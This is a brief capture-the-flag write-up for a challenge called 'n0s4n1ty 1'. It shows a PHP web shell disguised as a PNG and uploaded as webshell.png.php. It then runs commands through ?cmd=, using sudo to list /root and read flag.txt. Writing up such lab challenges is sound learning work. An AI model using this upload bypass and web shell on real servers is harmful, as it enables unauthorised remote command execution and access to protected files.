Skip to content

n0s4n1ty 1

Similar to this challenge

Upload a webshell.png.php:

PNG
<?php echo system($_GET['cmd']); ?>

The webshell can be accessed at /uploads/webshell.png.php

?cmd=ls /root/ doesn't give anything \ ?cmd=sudo ls /root/ lists the files in /root, which includes a flag.txt \ ?cmd=sudo cat /root/flag.txt prints the flag